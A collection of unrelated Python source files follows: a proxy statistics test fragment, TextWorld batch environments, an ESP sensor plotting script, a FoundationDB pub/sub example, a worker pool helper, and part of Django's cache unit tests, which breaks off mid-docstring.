tcp_cli.send(data)
tcp_cli.recv(4096)
tcp_cli.close()
data, addr = cli.recvfrom(1506)
data = common.to_str(data)
assert data.startswith('stat: ')
data = data.split('stat:')[1]
stats = shell.parse_json_in_str(data)
assert '7001' in stats
logging.info('TCP statistics test passed')
# test statistics for UDP
header = common.pack_addr(b'127.0.0.1') + struct.pack('>H', 80)
data = encrypt.encrypt_all(b'foobar2', 'aes-256-cfb', 1,
header + b'test')
udp_cli = socket.socket(type=socket.SOCK_DGRAM)
udp_cli.sendto(data, ('127.0.0.1', 8382))
tcp_cli.close()
data, addr = cli.recvfrom(1506)
data = common.to_str(data)
assert data.startswith('stat: ')
data = data.split('stat:')[1]
stats = json.loads(data)
assert '8382' in stats
logging.info('UDP statistics test passed')
manager._loop.stop()
t.join()
if __name__ == '__main__':
test()
|
batch_env.py
|
import multiprocessing as mp
from typing import Tuple, List, Dict
import numpy as np
from textworld.core import Environment
def _list_of_dicts_to_dict_of_lists(list_: List[Dict]) -> Dict[str, List]:
# Convert List[Dict] to Dict[List]
keys = set(key for dict_ in list_ for key in dict_)
return {key: [dict_.get(key) for dict_ in list_] for key in keys}
def _child(env_fn, parent_pipe, pipe):
"""
Event loop run by the child processes
"""
try:
parent_pipe.close()
env = env_fn()
while True:
command = pipe.recv()
# command is a tuple like ("call" | "get", "name.of.attr", extra args...)
obj = env
attrs = command[1].split(".")
for attr in attrs[:-1]:
obj = getattr(obj, attr)
if command[0] == "call":
fct = getattr(obj, attrs[-1])
result = fct(*command[2])
elif command[0] == "get":
result = getattr(obj, attrs[-1])
elif command[0] == "hasattr":
result = hasattr(obj, attrs[-1])
pipe.send(result)
finally:
env.close()
pipe.close()
class _ChildEnv:
"""
Wrapper for an env in a child process.
"""
def __init__(self, env_fn):
self._pipe, child_pipe = mp.Pipe()
self._process = mp.Process(target=_child, args=(env_fn, self._pipe, child_pipe))
self._process.daemon = True
self._process.start()
child_pipe.close()
def call(self, method, *args):
self._pipe.send(("call", method, args))
def get(self, attr):
self._pipe.send(("get", attr))
def hasattr(self, attr):
self._pipe.send(("hasattr", attr))
def result(self):
return self._pipe.recv()
def call_sync(self, *args):
self.call(*args)
return self.result()
def get_sync(self, *args):
self.get(*args)
return self.result()
def hasattr_sync(self, *args):
self.hasattr(*args)
return self.result()
def __del__(self):
self.call_sync("close")
self._pipe.close()
self._process.terminate()
self._process.join()
class AsyncBatchEnv(Environment):
""" Environment to run multiple games in parallel asynchronously. """
def __init__(self, env_fns: List[callable], auto_reset: bool = False):
"""
Parameters
----------
env_fns : iterable of callable
Functions that create the environments.
"""
self.env_fns = env_fns
self.auto_reset = auto_reset
self.batch_size = len(self.env_fns)
self.envs = []
for env_fn in self.env_fns:
self.envs.append(_ChildEnv(env_fn))
def load(self, game_files: List[str]) -> None:
assert len(game_files) == len(self.envs)
for env, game_file in zip(self.envs, game_files):
env.call("load", game_file)
# Join
for env in self.envs:
env.result()
def seed(self, seed=None):
# Use a different seed for each env to decorrelate batch examples.
rng = np.random.RandomState(seed)
seeds = list(rng.randint(65635, size=self.batch_size))
for env, seed in zip(self.envs, seeds):
env.call_sync("seed", seed)
return seeds
def reset(self) -> Tuple[List[str], Dict[str, List[str]]]:
"""
Reset all environments of the batch.
Returns:
obs: Text observations, i.e. command's feedback.
infos: Information requested when creating the environments.
"""
self.last = [None] * self.batch_size
for env in self.envs:
env.call("reset")
results = [env.result() for env in self.envs]
obs, infos = zip(*results)
infos = _list_of_dicts_to_dict_of_lists(infos)
return obs, infos
def step(self, actions: List[str]) -> Tuple[List[str], int, bool, Dict[str, List[str]]]:
"""
Perform one action per environment of the batch.
Returns:
obs: Text observations, i.e. command's feedback.
reward: Current game score.
done: Whether the game is over or not.
infos: Information requested when creating the environments.
"""
results = []
for i, (env, action) in enumerate(zip(self.envs, actions)):
if self.last[i] is not None and self.last[i][2]: # Game has ended on the last step.
obs, reward, done, infos = self.last[i] # Copy last state over.
if self.auto_reset:
reward, done = 0., False
obs, infos = env.call_sync("reset")
results.append((obs, reward, done, infos))
else:
env.call("step", action)
results.append(None)
results = [result or env.result() for env, result in zip(self.envs, results)]
obs, rewards, dones, infos = zip(*results)
self.last = results
infos = _list_of_dicts_to_dict_of_lists(infos)
return obs, rewards, dones, infos
def render(self, mode='human'):
for env in self.envs:
env.call("render", mode)
return [env.result() for env in self.envs]
def close(self):
for env in self.envs:
env.call("close")
# Join
for env in self.envs:
env.result()
class SyncBatchEnv(Environment):
""" Environment to run multiple games independently synchronously. """
def __init__(self, env_fns: List[callable], auto_reset: bool = False):
"""
Parameters
----------
env_fns : iterable of callable
Functions that create the environments
"""
self.env_fns = env_fns
self.batch_size = len(self.env_fns)
self.auto_reset = auto_reset
self.envs = [env_fn() for env_fn in self.env_fns]
def load(self, game_files: List[str]) -> None:
assert len(game_files) == len(self.envs)
for env, game_file in zip(self.envs, game_files):
env.load(game_file)
def seed(self, seed=None):
# Use a different seed for each env to decorrelate batch examples.
rng = np.random.RandomState(seed)
seeds = list(rng.randint(65635, size=self.batch_size))
for env, seed in zip(self.envs, seeds):
env.seed(seed)
return seeds
def reset(self):
"""
Reset all environments of the batch.
Returns:
obs: Text observations, i.e. command's feedback.
infos: Information requested when creating the environments.
"""
self.last = [None] * self.batch_size
results = [env.reset() for env in self.envs]
obs, infos = zip(*results)
infos = _list_of_dicts_to_dict_of_lists(infos)
return obs, infos
def step(self, actions):
"""
Perform one action per environment of the batch.
Returns:
obs: Text observations, i.e. command's feedback.
reward: Current game score.
done: Whether the game is over or not.
infos: Information requested when creating the environments.
"""
results = []
for i, (env, action) in enumerate(zip(self.envs, actions)):
if self.last[i] is not None and self.last[i][2]: # Game has ended on the last step.
obs, reward, done, infos = self.last[i] # Copy last state over.
if self.auto_reset:
reward, done = 0., False
obs, infos = env.reset()
results.append((obs, reward, done, infos))
else:
results.append(env.step(action))
self.last = results
obs, rewards, dones, infos = zip(*results)
infos = _list_of_dicts_to_dict_of_lists(infos)
return obs, rewards, dones, infos
def render(self, mode='human'):
return [env.render(mode=mode) for env in self.envs]
def close(self):
for env in self.envs:
env.close()
|
data_playground.py
|
import pandas as pd
import numpy as np
import esp_connection as esp
import multiprocessing as mp
import time
import matplotlib
# have to do this to set backend of matplotlib. otherwise no graph is displayed
matplotlib.use("TKAgg")
import matplotlib.pyplot as plt
class DataPlayground:
def __init__(self):
self.index_data = None
self.norm_const = None
self.calibration_data = None
self.np_data = None
self.esp_data = None
self.init_queue = None
self.init_done = False
self.graph = None
self.moving_averages = np.empty([0, 7])
# set in init_from_queue
self.gravity = -1
self.gyro = -1
# n is the number of data points I will pull
def get_new_data(self):
size = self.esp_data.qsize()
# because we have 7 datapoints
temp = np.empty([size, 7])
# really optimal ?
for i in range(size):
data = self.esp_data.get()
temp[i] = data
temp = (temp - self.calibration_data) * self.norm_const
if self.np_data == None:
self.np_data = temp
else:
self.np_data = np.append(self.np_data, temp, axis=0)
# plotting here
self.calculate_moving_average(self.index_data["GyroX"])
# plotting here
if self.np_data.shape[0] > 500:
self.plot_data(self.index_data["GyroX"])
# currently the data is put in and got in this order
def init_from_queue(self):
self.norm_const = self.init_queue.get()
self.index_data = self.init_queue.get()
self.calibration_data = self.init_queue.get()
self.gravity = self.init_queue.get()
self.gyro = self.init_queue.get()
self.init_done = True
def plot_data(self, direction):
far_back = 500
data_to_use = self.moving_averages[-far_back:, direction]
time_to_use = self.np_data[-far_back:, self.index_data["Time"]]
if self.graph is None:
# put plt in interactive mode
plt.ion()
self.graph = plt.plot(time_to_use, data_to_use)[0]
self.graph.set_ydata(data_to_use)
self.graph.set_xdata(time_to_use)
plt.axis([min(time_to_use), max(time_to_use), -250, 250])
plt.draw()
plt.pause(0.01)
# calculates and sets the moving average
# direction: tells us which axis we are getting data from (int)
# call after we set and received acceleration data
def calculate_moving_average(self, direction, num_average_over=20):
if self.np_data.shape[0] < num_average_over:
return
# here we set the window through which we will convolve and also normalize scalars
# TODO do a nonlinear normalization. e.g. an exponentially increasing scaling which gives more recent
# Todo datapoints more importance.
window = np.repeat(1, num_average_over) / num_average_over
if self.moving_averages.shape[0] < num_average_over:
data = self.np_data[direction, self.moving_averages.shape[0]:]
data = data * self.np_data[self.index_data["Time"]][self.moving_averages.shape[0]:, ]
temp = np.convolve(data, window, 'same')
else:
# need to append extra data from what we have to make moving averages more accurate
data = self.np_data[direction, self.moving_averages.shape[0] - (num_average_over-1):]
data = data * self.np_data[self.index_data["Time"]][self.moving_averages.shape[0] - (num_average_over-1):, ]
temp = np.convolve(data, window, 'valid')
self.moving_averages = np.append(self.moving_averages, np.empty([temp.shape[0], 7]), axis=0)
self.moving_averages[-temp.shape[0]:, direction] = temp
def start_communication(self):
# not setting it as instance variable since we can not
# properly communicate with it anyway.
espClient = esp.EspClient()
play = DataPlayground()
play.init_queue = mp.Queue()
play.esp_data = mp.Queue()
p = mp.Process(target=espClient.start_esp, args=(play.esp_data, play.init_queue,))
p.start()
while True:
# need to know how many things will be put in the queue beforehand.
if play.init_queue.qsize() == 5:
play.init_from_queue()
if play.init_done:
play.get_new_data()
if __name__ == "__main__":
# not setting it as instance variable since we can not
# properly communicate with it anyway.
espClient = esp.EspClient(raw_data=True)
play = DataPlayground()
play.init_queue = mp.Queue()
play.esp_data = mp.Queue()
p = mp.Process(target=espClient.start_esp, args=(play.esp_data, play.init_queue,))
p.start()
while True:
# need to know how many things will be put in the queue beforehand.
if play.init_queue.qsize() == 5:
play.init_from_queue()
if play.init_done:
play.get_new_data()
time.sleep(1)
|
pubsub_example.py
|
#
# pubsub_example.py
#
# This source file is part of the FoundationDB open source project
#
# Copyright 2013-2018 Apple Inc. and the FoundationDB project authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###################
# PubSub Example #
###################
# This example generates a simple topology with specified numbers of feeds and
# inboxes. Inboxes are randomly subscribed to feeds. Each feed and inbox is then
# run in its own thread. Feeds post a specified number of messages, waiting a
# random interval between messages. Each inbox is polled for messages received,
# terminating when no messages are received for a wait limit.
import random
import threading
import time
import fdb
from pubsub import PubSub
fdb.api_version(22)
db = fdb.open()
ps = PubSub(db)
ps.clear_all_messages()
# Create the specified numbers of feeds and inboxes. Subscribe each inbox to a
# randomly selected subset of feeds.
def setup_topology(feeds, inboxes):
feed_map = {f: ps.create_feed('Alice ' + str(f)) for f in range(feeds)}
inbox_map = {}
for i in range(inboxes):
inbox_map[i] = ps.create_inbox('Bob ' + str(i))
for f in random.sample(xrange(feeds), random.randint(1, feeds)):
ps.create_subscription(inbox_map[i], feed_map[f])
return feed_map, inbox_map
# Post a fixed number of messages, waiting a random interval under 1 sec
# between each message
def feed_driver(feed, messages):
for i in range(messages):
ps.post_message(feed, 'Message {} from {}'.format(i, feed.get_name()))
time.sleep(random.random())
def get_and_print_inbox_messages(inbox, limit=10):
print "\nMessages to {}:".format(inbox.get_name())
for m in ps.get_inbox_messages(inbox, limit):
print " ->", m
# Poll the inbox every 0.1 sec, getting and printing messages received,
# until no messages have been received for 1.1 sec
def inbox_driver(inbox):
wait_limit = 1.1
wait_inc = 0.1
waited = 0.0
changed = False
latest = None
while True:
get_and_print_inbox_messages(inbox)
changed = (latest != inbox.latest_message)
latest = inbox.latest_message
if not changed and waited > wait_limit:
break
waited += wait_inc
time.sleep(wait_inc)
# Generate and run a thread for each feed and each inbox.
def run_threads(feed_map, inbox_map, messages):
feed_threads = [threading.Thread(target=feed_driver, args=(feed_map[id], messages))
for id in feed_map]
inbox_threads = [threading.Thread(target=inbox_driver, args=(inbox_map[id],))
for id in inbox_map]
for f in feed_threads:
f.start()
for i in inbox_threads:
i.start()
for f in feed_threads:
f.join()
for i in inbox_threads:
i.join()
def sample_pubsub(feeds, inboxes, messages):
feed_map, inbox_map = setup_topology(feeds, inboxes)
run_threads(feed_map, inbox_map, messages)
if __name__ == "__main__":
sample_pubsub(3, 3, 3)
|
sample-1.py
|
import asyncio
import collections
import concurrent.futures
import multiprocessing
import multiprocessing.pool
import queue
import sys
import threading
import time
import types
from .arguments import Arguments
__all__ = ["Pool"]
class Queue(object):
def __init__(self, values):
self.__reference = values
self._values = multiprocessing.Queue()
self._stop = multiprocessing.Event()
self._complete = multiprocessing.Event()
self._thread = threading.Thread(target=self.__fill, )
self._thread.start()
def __fill(self):
for element in self.__reference:
if self._stop.is_set():
break
self._values.put(element)
self._complete.set()
def empty(self):
if self._complete.is_set():
return self._values.empty()
return False
def get(self, block=True, timeout=None):
return self._values.get(block=block, timeout=timeout)
def join(self):
self._thread.join()
def stop(self):
self._stop.set()
async def _call_blocking(loop: asyncio.AbstractEventLoop, executor: concurrent.futures.Executor, func, *args):
futures = [
loop.run_in_executor(executor, func, *args)]
while futures:
done, futures = await asyncio.wait(
futures,
loop=loop, return_when=asyncio.ALL_COMPLETED
)
for f in done:
await f
return f.result()
class Pool(object):
def __init__(
self,
function_: collections.abc.Callable or types.FunctionType or types.MethodType,
function_arguments: Arguments or collections.abc.Iterable[Arguments or collections.abc.Iterable],
check_function: collections.abc.Callable = lambda _: True,
success_function: collections.abc.Callable = print,
max_processes: int = 1,
max_threads: int = 1,
optimize_workers: bool = True,
speed_reference: float = 0.001, # 1000 operations in 1 second
processes_as_threads: bool = False,
unsafe_workers: bool = False
):
if not isinstance(function_, collections.abc.Callable):
raise ValueError("function_ must be callable")
if not unsafe_workers:
if max_threads > 300:
raise ResourceWarning("Exceeded the safe amount of threads per process (300)")
elif max_processes > 100:
raise ResourceWarning("Exceeded the safe amount of processes (100)")
if max_processes == 0:
raise ValueError("max_processes can't be zero")
if max_threads == 0:
raise ValueError("max_threads can't be zero")
self._function = function_
self._check_function = check_function
self._success_function = success_function
self._processes = max_processes
self._threads = max_threads
self._optimize_workers = optimize_workers
self._blocking_success = None
self._processes_as_threads = processes_as_threads
self.__speed_reference = speed_reference
self._success_sync_queue = None
self._running = False
self._complete = multiprocessing.Event()
self._raw_function_arguments = (v for v in function_arguments)
self._start_thread = None
self._function_arguments = None
def _sync_success(self):
while not self._complete.is_set():
try:
self._success_function(self._success_sync_queue.get(timeout=0))
except queue.Empty:
continue
while not self._success_sync_queue.empty():
try:
self._success_function(self._success_sync_queue.get(timeout=0))
except queue.Empty:
continue
def _get(self):
return self._function_arguments.get(timeout=0)
async def _callback(self, loop: asyncio.AbstractEventLoop, executor: concurrent.futures.Executor):
while not self._function_arguments.empty():
try:
args = await _call_blocking(loop, executor, self._get)
except queue.Empty:
continue
output = await _call_blocking(loop, executor, self._function, *args)
is_valid = await _call_blocking(loop, executor, self._check_function, output)
if is_valid:
if self._blocking_success:
self._success_function(output)
else:
await _call_blocking(loop, executor, self._success_sync_queue.put, output)
async def __process_worker(self, loop: asyncio.AbstractEventLoop, executor: concurrent.futures.Executor):
futures = [self._callback(loop, executor) for _ in range(self._threads)]
while futures:
done, futures = await asyncio.wait(
futures,
loop=loop,
return_when=asyncio.ALL_COMPLETED
)
for f in done:
await f
def _process_worker(self):
for try_ in range(5):
try:
executor = concurrent.futures.ThreadPoolExecutor(max_workers=self._threads)
loop = asyncio.new_event_loop()
loop.run_until_complete(self.__process_worker(loop, executor))
loop.close()
executor.shutdown(wait=True)
return
except ImportError:
pass
def run(self) -> float:
if self._complete.is_set():
raise StopIteration("This runner has already being used")
if self._running:
raise StopIteration("This runner is being executed")
self._running = True
if (self._threads != 1 or self._processes != 1) and self._optimize_workers:
t = time.time()
result = self._function(*next(self._raw_function_arguments))
time_spent = time.time() - t
if self._check_function(result):
self._success_function(result)
if time_spent < self.__speed_reference:
self._threads = 1
self._processes = 1
self._function_arguments = self._raw_function_arguments
else:
self._function_arguments = self._raw_function_arguments
if self._threads == self._processes and self._threads == 1:
self._function_arguments: collections.Iterable
start = time.time()
for args in self._function_arguments:
output = self._function(*args)
if self._check_function(output):
self._success_function(output)
return time.time() - start
self._function_arguments = Queue(self._raw_function_arguments)
if self._processes == 1 or self._threads == 1:
if self._processes > self._threads:
self._threads = self._processes
self._blocking_success = True
start = time.time()
self._process_worker()
return time.time() - start
self._blocking_success = False
self._success_sync_queue = multiprocessing.Queue()
sync_thread = threading.Thread(target=self._sync_success, )
sync_thread.start()
if any(platform in sys.platform for platform in ("win", "ios")) or self._processes_as_threads:
process_pool = multiprocessing.pool.ThreadPool
else:
process_pool = multiprocessing.pool.Pool
start = time.time()
pool = process_pool(processes=self._processes)
pool.imap_unordered(lambda f: f(), (self._process_worker for _ in range(self._processes)),
chunksize=self._processes)
pool.close()
pool.join()
pool.terminate()
self._complete.set()
self._function_arguments.stop()
self._function_arguments.join()
sync_thread.join()
self._running = False
return time.time() - start
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import os
import re
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management
from django.core.cache import cache, caches, CacheKeyWarning, InvalidCacheBackendError
from django.db import connection, router, transaction
from django.core.cache.utils import make_template_fragment_key
from django.http import HttpResponse, StreamingHttpResponse
from django.middleware.cache import (FetchFromCacheMiddleware,
UpdateCacheMiddleware, CacheMiddleware)
from django.template import Template
from django.template.response import TemplateResponse
from django.test import TestCase, TransactionTestCase, RequestFactory, override_settings
from django.test.utils import (IgnoreDeprecationWarningsMixin,
IgnorePendingDeprecationWarningsMixin)
from django.utils import six
from django.utils import timezone
from django.utils import translation
from django.utils.cache import (patch_vary_headers, get_cache_key,
learn_cache_key, patch_cache_control, patch_response_headers)
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpickable(object):
def __getstate__(self):
raise pickle.PickleError()
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(TestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertEqual(cache.get("key"), None)
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertEqual(result, True)
self.assertEqual(cache.get("addkey1"), None)
def test_non_existent(self):
"Non-existent keys aren't found in the dummy cache backend"
self.assertEqual(cache.get("does_not_exist"), None)
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), None)
cache.delete("key1")
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), None)
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertEqual(cache.has_key("hello1"), False)
self.assertEqual(cache.has_key("goodbye1"), False)
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertEqual("hello2" in cache, False)
self.assertEqual("goodbye2" in cache, False)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr, 'answer')
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr, 'answer')
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), None)
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertEqual(cache.get("expire1"), None)
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), None)
self.assertEqual(cache.has_key("expire3"), False)
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), None)
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr_version, 'answer')
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr_version, 'answer')
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `params` are test specific overrides and `_caches_settings_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
setting = dict((k, base.copy()) for k in _caches_setting_base.keys())
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertEqual(result, False)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertEqual(cache.get("does_not_exist"), None)
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertEqual(cache.has_key("hello1"), True)
self.assertEqual(cache.has_key("goodbye1"), False)
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertEqual("hello2" in cache, True)
self.assertEqual("goodbye2" in cache, False)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertEqual(cache.get("expire1"), None)
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertEqual(cache.has_key("expire3"), False)
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), None)
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), None)
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), None)
def test_long_timeout(self):
'''
Using a timeout greater than 30 days makes memcached think
it is an absolute expiration timestamp instead of a relative
